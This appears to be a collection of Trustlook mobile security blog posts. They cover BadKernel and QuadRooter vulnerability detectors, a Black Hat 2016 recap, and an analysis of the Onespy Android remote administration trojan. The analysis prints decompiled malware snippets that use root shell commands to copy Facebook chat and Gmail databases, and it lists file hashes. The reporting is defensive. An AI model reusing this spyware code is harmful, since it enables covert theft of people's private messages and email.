Trustlook Sentinel Whitepaper Now Available!

Are you interested in learning more about one of the most groundbreaking technologies in mobile security?

Trustlook Sentinel is the first ever 100% behavioral based malware detection engine built into the operating system of a mobile device. It’s provides real-time zero day detection of malware. Download the whitepaper here and discover when Sentinel is considered a game changer in security. >>

Trustlook Mobile Security Releases Instant Protection Feature

Trustlook has released a new feature in its Trustlook Mobile Security app that proactively notifies users of any new malware on their device. Instead of a user needing to re-scan their device in order to find malware, Trustlook will send a message to users if it discovers malware that was previously unknown.

For example:

  1. Jack installs a new app
  2. The Trustlook Mobile Security protection is triggered, and the app is uploaded to Trustlook’s cloud. But in some small instances Trustlook’s system has no prior knowledge of the app, so we consider it benign.
  3. A few days later, Trustlook’s Core Security system detects this new app as a malware
  4. Trustlook Operations launches “Instant Protection” to notify Jack of this malware and to uninstall the app.

In a perfect world, mobile devices would be 100% protected from security risks because security vendors would be aware of every malicious application that exists. However, that is not reality.  It’s not possible to have full, 100% coverage. So to mitigate this security risks, Trustlook now offers Instant Protection.

Oops! BadKernel Now Affects 100 Million, Not 30 Million

We reported last week that BadKernel, a flaw in the Google Chromium mobile browser framework that spreads as users click on malicious links, affects 30 million Android users. However, from our internal reporting over the past few days, it’s clear that the actual number is much higher. Our new estimate is that BadKernel now impacts 100 million Android users. This is about 7% of the total Android user base.

Trustlook has released a new feature in its Trustlook Mobile Security  app that detects BadKernel. You are encouraged to scan your phone today and see if you are impacted.

Trustlook Releases BadKernel Vulnerability Detector

An Updated Version (Version 3.5.10) of the Trustlook Mobile Security App Identifies the BadKernel Issue Affecting 30 Million Android Users

Trustlook has released a new feature in its Trustlook Mobile Security app that detects BadKernel, the widespread vulnerability affecting millions of Android devices.

First discovered in August 2016, BadKernel is a flaw in the Google Chromium mobile browser framework that spreads as users click on malicious links. Users of older versions of Chromium-powered mobile browsers, as well as applications with embedded Webview (such as the massively popular WeChat app) may be vulnerable. If infected, a user’s contacts and text messages could be exposed, as well as any payment passwords.

To determine if your device is vulnerable to this threat, open the Trustlook Mobile Security app, navigate to the BadKernel Vulnerability detector on the main screen, and click “Check it Now.” If you are exposed, you can update your browser software.

Screenshot_2016-08-26-11-50-26         Screenshot_2016-08-26-11-50-33
The BadKernel vulnerability impacts an estimated 30 million Android smartphones and tablets. The flaw involves a bug in the source code of Google’s V8 JavaScript Engine, which is a component of the open-source Chromium. An attacker can exploit this flaw to cause key object information leakage.

Since many phones are not using the most current browser software, this zero-day attack could be used widely. Trustlook encourages users to run a quick scan of their phone and update their browser if they are affected. In addition, Trustlook suggests users not click on random links or links that appear suspicious. They also stress users keep their apps and OS updated, and continually monitor their device for any potential issues.

To check if your Android device is affected by the BadKernel vulnerability, please download the Trustlook Mobile Security app.

Black Hat 2016 Recap and 5 Key Takeaways

Trustlook was thrilled to be part of Black Hat 2016 at Mandalay Bay in Las Vegas. We had a booth in Innovation City, and had the chance to meet many great people in the security industry as well as learn a lot of great new things about cyber security. We successfully launched two new products: Trustlook Sentinel and SkyEye. We were also excited to be interviewed by the Security Guy Radio show and Decrypted Tech. Here are our top 5 takeaways from Black Hat 2016.

1. People Think Mobile is Safe
It was surprising to hear feedback from some industry experts who feel that security issues on mobile devices are “not that big of a deal.” In fact, there were only a handful of mobile security companies at the show. That thinking, unfortunately, is completely wrong. Mobile device usage is growing faster each and every day, and BYOD is becoming the norm across much of the corporate world. Further, the complex technology stack and OS fragmentation in Android devices further complicates matters and increases the fragility of this endpoint. Needless to say, mobile will continue to be a preferred exploitation point for hackers.

2. Partnerships in Security are the Name of the Game
With many companies focusing on different areas of security (such as network, app, cloud, data, mobile, etc.) it’s only natural for these companies to want to work together to develop custom solutions for organizations. We were approached by many companies wanting to leverage our mobile security expertise. CISOs are looking for solutions that solve their problems, not disparate solutions that result in more headaches. Cross-vendor product integrations will continue to grow to meet the complex and unique needs of organizations.

3. Ransomware is Top of Mind
It’s clear the rise of deceptive ransomware is top of mind with customers, vendors, and researchers alike. We went to a great Ransomware session hosted by security firm CyberArk. They shared examples of Ransomware including geo-targeted attacks, as well as info how Ransomware authors use customized local content while focusing their efforts on richer countries that can afford to pay the ransom.

4. Machine Learning, Machine Learning, Machine Learning
If I had a nickel for every time I heard “Machine Learning” at Black Hat… Machine Learning, the technology, has been around for a while in many aspects of life, and increasingly more in security, as threat detection by way of signatures is being replaced by behavioral methods and machine learning. But Machine Learning, the buzzy catchphrase, is still relatively new, and shows no signs of losing its coolness. The good news for Trustlook is that we fit in nicely to any Machine Learning conversation. Our new product Sentinel, the first ever 100% ROM-level malware detection engine, is built upon machine learning in that it improves (i.e. learns) with each behavior it sees in an app.

5. iOS Security is an Issue
We were amazed by the number of people who approached us looking for an iOS security solution. (We are currently developing one). One person, in particular, develops custom security products for executives from large Fortune 500 companies. Most of these execs use an iPhone, or other iOS devices. He has seen first-hand these devices compromised and understands the potential problems when this happens. He wants to build additional security protections into the platform.

Were you at Black Hat 2016? Do you have any thoughts on the show? Let us know in the comments.

Trustlook Discovers a Remote Administration Tool (RAT) Android Malware

High Risk Malware by Onespy collects data from popular apps

The malicious app was detected by Trustlook as “Android.Trojan.Pathcall”, with a severity rating of  8/10 (High Risk). It disguises itself as a “System Settings” app to avoid being removed. The app starts as a service and is invisible to the user.

The package can be identified as having the following characteristics:

  • MD5: 28de4b4d2e964ad25403e9c2133b2939
  • SHA256: 6f86bb869c865910c44a2b033c547a7a8b220ae3c48cd5948e74b32df286dbbc
  • Size: 184036 bytes
  • App name: Settings
  • Package name: com.path.call

The package icon is:

image00

Upon execution, the app persuades the user to grant device administrator access in order to maintain the persistence on the system:

 

image02


The app runs itself as a service in the background:

 

image01


From the screenshot below, the second “Settings” is cleverly disguised as the Remote Administration Tool (RAT) app:

 

image04


The app is developed by “www.onespy.in” and signed with the following certificate:

 

image03


Apparently the app is signed by the Android Debug Certificate. The website claims the app is “undeletable” even after a factory data reset. However, it can be removed if the user knows how to terminate the service.

The website provides a remote access panel. Depending on the packages one chooses, the registered user can perform different functions and retrieve data from many popular apps. Data such as:

  • Call Logs
  • Call Recordings
  • Applications
  • Contacts
  • SMS Messages
  • Photos
  • Surroundings
  • GPS Locations
  • Facebook Chat
  • Hike Chat
  • IMO Chat
  • Line Chat
  • Skype Call Logs
  • Skype Chat
  • Viber Call Logs
  • Viber Chat
  • WhatsApp Call Logs
  • WhatsApp Chat
  • Gmail Emails
  • Outlook Emails
  • Yahoo Emails
  • Photo Capture
  • Screenshots


In addition to the above data, the app contains code to retrieve data from Twitter, Facebook, and Gmail. For example, the following code snippets are used to retrieve Facebook chat data:

public class FBDBSender

{

 private static boolean copyDB(String paramString1, String paramString2)

 {

   try

   {

     L.l(“fb copy:” + paramString1 + “;” + paramString2);

     paramString1 = “cp ” + paramString1 + ” ” + paramString2;

     int i = Runtime.getRuntime().exec(new String[] { “su”, “-c”, paramString1 }).waitFor();

     return i == 0;

   }

   catch (Exception paramString1)

   {

     L.l(paramString1);

   }

   return false;

 }

 

 private static String getName(String paramString)

 {

   try

   {

     paramString = new JSONObject(paramString).getString(“name”);

     return paramString;

   }

   catch (Exception paramString) {}

   return “”;

 }

[…]

 private static void sendThreadsTable(Context paramContext)

 {

   if (Environment.getExternalStorageState().equals(“mounted”)) {

     localObject = Environment.getExternalStorageDirectory().getAbsolutePath();

   }

   for (;;)

   {

     str = localObject + “/fbdb2.db”;

     if (Environment.getExternalStorageState().equals(“mounted”))

     {

       localObject = Environment.getExternalStorageDirectory().getAbsolutePath();

       localObject = localObject + “/fb_chat.csv”;

     }

     for (;;)

     {

       try

       {

         if (copyDB(“/data/data/com.facebook.katana/databases/threads_db2”, str))

         {

           L.l(“fbdb copied”);

           localSQLiteDatabase = SQLiteDatabase.openDatabase(str, null, 1);

           localCursor = localSQLiteDatabase.rawQuery(“SELECT sender, text, timestamp_ms FROM messages”, null);

    […]


The following code snippets are used to get Gmail data:

public class GMailAppDBReader

{

 private static final String dbnamePrefix = “gmldbcp_”;

 

 private static String[] copyDB(Context paramContext)

 {

   Object localObject3;

   int i;

   int j;

   OutputStream localOutputStream;

   try

   {

     localObject1 = Runtime.getRuntime().exec(new String[] { “su”, “-c”, “find / -name mailstore*@gmail.com.db” }).getInputStream();

     Object localObject2 = new byte[660];

     localObject3 = new StringBuffer();

     for (;;)

     {

       i = ((InputStream)localObject1).read((byte[])localObject2);

       if (i == -1)

       {

         localObject2 = ((StringBuffer)localObject3).toString().split(“n”);

         localObject3 = new String[localObject2.length];

         j = 0;

         Process localProcess = Runtime.getRuntime().exec(“su”);

         localOutputStream = localProcess.getOutputStream();

         int k = localObject2.length;

         i = 0;

         if (i < k) {

           break;

         }

        […]

   String str = ((String)localObject1).substring(((String)localObject1).lastIndexOf(‘/’) + 1, ((String)localObject1).lastIndexOf(‘@’));

   StringBuilder localStringBuilder = new StringBuilder(“cp “).append((String)localObject1).append(” “);

   if (Environment.getExternalStorageState().equals(“mounted”)) {}

   for (Object localObject1 = Environment.getExternalStorageDirectory().getAbsolutePath();; localObject1 = paramContext.getFilesDir().getAbsolutePath())

   {

     localOutputStream.write(((String)localObject1 + “/” + “gmldbcp_” + str + “.dbn”).getBytes());

     localObject3[j] = str;

     j += 1;

     i += 1;

     break;

   }

 }

      […]


One special feature that the app provides is the ability to run a remote command shell, which gives the controller access to the linux system in an android device:

public class ExecShell {

   public enum SHELL_CMD {

       public static final enum SHELL_CMD check_su_binary;

 

       static {

           SHELL_CMD.check_su_binary = new SHELL_CMD(“check_su_binary”, 0, new String[]{“/system/xbin/which”,

                   “su”});

           SHELL_CMD.ENUM$VALUES = new SHELL_CMD[]{SHELL_CMD.check_su_binary};

       }

 

       private SHELL_CMD(String arg1, int arg2, String[] command) {

           super(arg1, arg2);

           this.command = command;

       }

 

       public static SHELL_CMD valueOf(String arg1) {

           return Enum.valueOf(SHELL_CMD.class, arg1);

       }

 

       public static SHELL_CMD[] values() {

           SHELL_CMD[] v0 = SHELL_CMD.ENUM$VALUES;

           int v1 = v0.length;

           SHELL_CMD[] v2 = new SHELL_CMD[v1];

           System.arraycopy(v0, 0, v2, 0, v1);

           return v2;

       }

   }


Summary
The Remote Administration Tool by Onespy is very dangerous malware targeting Android devices. It exhibits backdoor functionality as well as the ability to collect data. The app can be used as a monitoring tool, as well as misused as a powerful remote control tool by criminals and malicious hackers.

Trustlook adds GPU detection to popular QuadRooter scanner app

Trustlook has again updated its popular Qualcomm QuadRooter Scanner App with version 1.2.3. QuadRooter is a set of four vulnerabilities (CVE-2016-2059, CVE-2016-2503, CVE-2016-2504, CVE-2016-5340, CVE-2016-2060) affecting an estimated 900 million Android smartphones and tablets built using Qualcomm chipsets. The key updates to the app are as follows:

Version 1.2.3:
– In addition to CPU (Central Processing Unit) we’ve added GPU (Graphic Processing Unit) detection since many QuadRooter issues are activated through Qualcomm’s GPU driver
– Interface tuneups

Please visit the Google Play store to update to the latest version of the QuadRooter detection app.